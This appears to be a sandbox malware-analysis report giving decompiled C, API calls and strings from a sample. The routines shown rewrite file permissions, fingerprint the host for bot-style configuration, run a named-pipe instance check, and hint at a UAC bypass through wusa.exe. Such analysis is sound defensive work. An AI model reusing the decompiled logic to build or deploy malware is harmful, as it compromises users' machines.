													 *0x41217c = _t27;
													return _t27;
												} else {
													goto L27;
												}
												while(1) {
													L27:
													_t24 =  *_t31;
													if(_t24 != 0xd && _t24 != 0xa) {
														goto L30;
													}
													_t31 = _t31 + 1;
												}
												goto L30;
											}
											_t25 =  &(_t25[1]);
										}
										if( *_t25 != 0x20) {
											_t25 = 0;
											goto L26;
										}
										goto L22;
									}
									goto L15;
								}
								goto L20;
							} else {
								goto L10;
							}
							do {
								L10:
								_t25 =  &(_t25[1]);
							} while ( *_t25 == 0x20);
							goto L16;
						}
					}
					_t31 = E0040ED03(_t42, 0xa);
					if(_t31 != 0) {
						goto L6;
					}
					_t29 = _t42;
					_t5 = _t29 + 1; // 0x409689
					_t41 = _t5;
					do {
						_t40 =  *_t29;
						_t29 = _t29 + 1;
					} while (_t40 != 0);
					_t31 = _t29 - _t41 + _t42;
					goto L6;
					L30:
					_t42 = _t31;
					if( *_t31 != 0) {
						Sleep(0x1f4); // executed
					}
					_v8 = _v8 + 1;
				} while ( *_t31 != 0);
				goto L33;
			}

0x004091f4
0x004091fb
0x00409201
0x00409208
0x00409308
0x00000000
0x00000000
0x00000000
0x00000000
0x0040920e
0x0040920e
0x00409216
0x0040921c
0x0040923f
0x00409241
0x00409249
0x0040924b
0x0040924b
0x00409259
0x0040925e
0x00409261
0x00409270
0x00000000
0x00409272
0x00409279
0x0040927f
0x00000000
0x0040929b
0x0040928e
0x0040928e
0x0040928f
0x00409293
0x00000000
0x00000000
0x0040928c
0x0040929a
0x0040929a
0x00000000
0x0040929a
0x0040928c
0x00409298
0x00000000
0x004092a8
0x004092a5
0x004092b2
0x004092b2
0x004092b5
0x004092b5
0x004092b6
0x004092bf
0x004092cf
0x004092d5
0x004092db
0x00409319
0x0040931f
0x00000000
0x00000000
0x00000000
0x00000000
0x004092dd
0x004092dd
0x004092dd
0x004092e1
0x00000000
0x00000000
0x004092e7
0x004092e7
0x00000000
0x004092dd
0x004092a7
0x004092a7
0x004092b0
0x004092bd
0x00000000
0x004092bd
0x00000000
0x004092b0
0x00000000
0x00409298
0x00000000
0x00000000
0x00000000
0x00000000
0x00409281
0x00409281
0x00409281
0x00409282
0x00000000
0x00409287
0x00409270
0x00409226
0x0040922c
0x00000000
0x00000000
0x0040922e
0x00409230
0x00409230
0x00409233
0x00409233
0x00409235
0x00409236
0x0040923c
0x00000000
0x004092ea
0x004092ed
0x004092ef
0x004092f6
0x004092f6
0x004092fc
0x004092ff
0x00000000

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: ExecuteShellSleep
String ID:
API String ID: 4194306370-0
Opcode ID: c86309d44ccec62141d82a488bd432547af8b47106777d1a6e333b4945649de3
Instruction ID: 162d7f392e51f347a0f03a95c4dfe3fd2355f2c09eeccb2d2824a4f222a18d72
Opcode Fuzzy Hash: c86309d44ccec62141d82a488bd432547af8b47106777d1a6e333b4945649de3
Instruction Fuzzy Hash: 7D41EE718083497EEB269664988C7E73BA49B52310F2809FFD492B72D3D7BC4D818759

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBCC, Relevance: 3.0, APIs: 2, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040EBCC(long _a4) {
				void* _t3;
				void* _t7;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t3;
				E0040EB74(_t7);
				return _t7;
			}

0x0040ebda
0x0040ebe0
0x0040ebe3
0x0040ebec

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA

Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateSize
String ID:
API String ID: 2559512979-0
Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC2, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				long _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c; // 0x50440625
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x61616161;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed
						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c; // 0x50440625
				}
				return _t6;
			}

0x00406dc5
0x00406dd5
0x00406de4
0x00406dea
0x00406df1
0x00406df4
0x00406df4
0x00406df6
0x00406df7
0x00406e00
0x00406e24
0x00406e24
0x00406e02
0x00406e14
0x00406e1a
0x00406e22
0x00000000
0x00000000
0x00406e22
0x00406e2e
0x00406e2e
0x00406e35

APIs

Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
String ID:
API String ID: 1823874839-0
Opcode ID: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
Instruction ID: 46d685041afc82653286dae93d5fe3173771f16ecf38a4b71df535c97c95e6ed
Opcode Fuzzy Hash: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
Instruction Fuzzy Hash: 55F028B9104218AFD710DB68DDC5ED777ADD704308F008476E242E3141D6B89D984B5C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407809, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}

0x0040781e
0x00407826
0x00407829
0x0040782c
0x00407837
0x00407a8e
0x00407a94
0x00407a94
0x0040785c
0x00407863
0x0040786e
0x00000000
0x00000000
0x0040787e
0x0040788b
0x004078a2
0x00000000
0x004078a8
0x004078c3
0x004078cc
0x004078cf
0x004078da
0x004078e0
0x004078e9
0x004078ed
0x00407917
0x00407917
0x004078ed
0x004078da
0x00407930
0x0040793b
0x00407a8d
0x00000000
0x00407a8d
0x00407941
0x00407946
0x00000000
0x00000000
0x0040794c
0x00407955
0x00000000
0x00000000
0x00000000
0x00000000
0x0040795b
0x0040795b
0x0040796b
0x00407a2a
0x00407a2a
0x00000000
0x00407a2a
0x00407977
0x00407979
0x0040797e
0x004079ae
0x004079b1
0x004079b6
0x004079bd
0x004079bd
0x004079c5
0x004079cb
0x004079d0
0x004079e5
0x004079d2
0x004079d7
0x004079de
0x004079de
0x004079ed
0x004079ef
0x004079f2
0x004079f5
0x004079f5
0x004079fb
0x00407a03
0x00407a09
0x00407a09
0x00407a0e
0x00407a24
0x00407a10
0x00407a13
0x00407a13
0x00407a27
0x00407a27
0x00000000
0x004079fb
0x00407980
0x00407994
0x00407997
0x00000000
0x00000000
0x00000000
0x00407997
0x0040799b
0x00000000
0x00000000
0x004079a3
0x004079a9
0x00407a2d
0x00407a2d
0x00407a34
0x00407a41
0x00407a47
0x00407a50
0x00407a54
0x00407a60
0x00407a83
0x00407a83
0x00407a87
0x00407a87
0x00407a54
0x00000000
0x00407a41

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0040782F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
GetLengthSid.ADVAPI32(?), ref: 00407878
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
LocalFree.KERNEL32(00000000), ref: 00407917
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
GetAce.ADVAPI32(?,00000000,?), ref: 00407963
EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
LocalFree.KERNEL32(00000000), ref: 00407A87

Strings

D, xrefs: 0040785C

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401280, Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0040139A
lstrlenW.KERNEL32(-00000003), ref: 00401571

Strings

wusa.exe, xrefs: 00401388
useless, xrefs: 0040161E
%systemroot%\system32\cmd.exe, xrefs: 00401316
<, xrefs: 00401378
, xrefs: 00401462
D, xrefs: 004015C6
@, xrefs: 00401380
uac, xrefs: 00401628

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: ExecuteShelllstrlen
String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
API String ID: 1628651668-1839596206
Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401D96, Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x61;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 8;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}

0x00401d9f
0x00401da9
0x00401daf
0x00401db4
0x00401dbc
0x00401dbe
0x00401dce
0x00401de0
0x00401dd0
0x00401ddb
0x00401ddb
0x00401de8
0x00401dfc
0x00401dff
0x00401e10
0x00401e14
0x00401e22
0x00401e22
0x00401e2a
0x00401e34
0x00401e38
0x00401e3e
0x00401e46
0x00401e4e
0x00401e51
0x00401e54
0x00401e59
0x00401e64
0x00401e67
0x00401e72
0x00401e77
0x00401e77
0x00401e7f
0x00401e84
0x00401e8e
0x00401e93
0x00401e96
0x00401ea0
0x00401ea8
0x00401ea2
0x00401ea2
0x00401ea2
0x00401eb4
0x00401eb9
0x00401ebc
0x00401ec1
0x00401ec9
0x00401ed3
0x00401ed8
0x00401edb
0x00401ede
0x00401ede
0x00401ee1
0x00401ee9
0x00401eee
0x00401ef1
0x00401ef6
0x00401f01
0x00401f05
0x00401f0e
0x00401f11
0x00401f11
0x00401f16
0x00401f1e
0x00401f23
0x00401f26
0x00401f2b
0x00401f36
0x00401f3a
0x00401f43
0x00401f46
0x00401f46
0x00401f52
0x00401f5e
0x00401f65
0x00401f69
0x00401f72
0x00401f77
0x00401f7a
0x00401f82
0x00401f8c
0x00401f9a
0x00401fb7
0x00401f9c
0x00401fa3
0x00401fae
0x00401fa5
0x00401fa5
0x00401fa5
0x00401fa3
0x00401f8e
0x00401f8e
0x00401f8e
0x00401fc0
0x00401fc2
0x00401fc2
0x00401fd6
0x00401fd9
0x00401fde
0x00401fea

APIs

GetVersionExA.KERNEL32 ref: 00401DC6
GetSystemInfo.KERNEL32(?), ref: 00401DE8
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
GetProcAddress.KERNEL32(00000000), ref: 00401E0A
GetCurrentProcess.KERNEL32(?), ref: 00401E1B
GetTickCount.KERNEL32 ref: 00401FC9

Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15

Strings

IsWow64Process, xrefs: 00401DF2
born_date, xrefs: 00401EAD, 00401ECC
localcfg, xrefs: 00401E2A, 00401E31, 00401E44, 00401E7D, 00401E8C, 00401EB2, 00401ED1, 00401EE7, 00401EFF, 00401F1C, 00401F34, 00401F50, 00401F70
net_type, xrefs: 00401E87
loader_id, xrefs: 00401F4B, 00401F6B
kernel32, xrefs: 00401DF7
flags_upd, xrefs: 00401E3E, 00401E43, 00401E7C
lid_file_upd, xrefs: 00401E25
hi_id, xrefs: 00401F16, 00401F1B, 00401F33
start_srv, xrefs: 00401E6C
work_srv, xrefs: 00401E5E

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
API String ID: 4207808166-1381319158
Opcode ID: 52000fdd36173797c6d9852f05b2f7d3bbe79e14d00c0f3373a6a06b26d807cb
Instruction ID: 54c1e59e0de162fea3d0b4a588507db8dabc792a1e082174f42e6dfe58141249
Opcode Fuzzy Hash: 52000fdd36173797c6d9852f05b2f7d3bbe79e14d00c0f3373a6a06b26d807cb
Instruction Fuzzy Hash: 3651FA705003446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA94487A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040405E, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00404000(E00403ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x4122f8;
					if(_t43 == 0) {
						L10:
						E0040EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
							if(_t99 != 0xffffffff) {
								break;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						L14:
						while(1) {
							do {
								L14:
								while(1) {
									do {
										if(ConnectNamedPipe(_t99, 0) != 0) {
											goto L16;
										}
										_t71 = GetLastError();
										asm("sbb eax, eax");
										if( ~(_t71 - 0x217) + 1 == 0) {
											L25:
											DisconnectNamedPipe(_t99);
											continue;
										}
										L16:
										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
										_t104 = _t104 + 0x14;
									} while (_t49 == 0);
									_t92 = _v16;
									_v8 = (_v12 >> 2) + _v12;
									E00403F18(_t99,  &_v8, 4, _t92, _t102);
									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
									_t104 = _t104 + 0x28;
									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
										goto L25;
									} else {
										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t62 == 0 || _v24 != 0xc) {
											goto L25;
										} else {
											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
											_t104 = _t104 + 0x14;
											if(_t64 == 0) {
												goto L25;
											}
											break;
										}
									}
								}
							} while (_v28 != 1);
							E00403F18(_t99,  &_v8, 4, _t92, _t102);
							_t103 = _t104 + 0x14;
							if(_v32 == 0) {
								_t102 = CloseHandle;
								CloseHandle(_t99);
								CloseHandle(_t92);
								E0040E318();
								L8:
								ExitProcess(0);
							}
							 *0x41215a =  *0x41215a + 1;
						}
					}
					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0040ECA5();
					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}

0x0040405e
0x0040406d
0x00404070
0x00404076
0x0040407b
0x00404090
0x00404096
0x00404097
0x0040409c
0x004040a1
0x004040a8
0x00404130
0x00404134
0x00404139
0x0040413e
0x0040413f
0x00404153
0x00404160
0x00404165
0x00000000
0x00000000
0x0040416c
0x00404174
0x00000000
0x00000000
0x00404179
0x00000000
0x00404182
0x00000000
0x00404188
0x00404188
0x00000000
0x00404188
0x00404188
0x00404193
0x00000000
0x00000000
0x00404195
0x004041a2
0x004041a5
0x0040425e
0x0040425f
0x00000000
0x0040425f
0x004041ab
0x004041b6
0x004041bb
0x004041be
0x004041c5
0x004041d0
0x004041da
0x004041e8
0x004041ed
0x004041f2
0x00000000
0x00404202
0x0040420b
0x00404210
0x00404215
0x00000000
0x0040421d
0x00404226
0x0040422b
0x00404230
0x00000000
0x00000000
0x00000000
0x00404230
0x00404215
0x004041f2
0x00404232
0x00404245
0x0040424a
0x00404251
0x0040426a
0x00404271
0x00404274
0x00404276
0x0040411f
0x00404121
0x00404121
0x00404253
0x00404253
0x00404188
0x004040b2
0x004040b7
0x004040be
0x00000000
0x00000000
0x004040c9
0x004040d5
0x004040e7
0x004040ec
0x004040f1
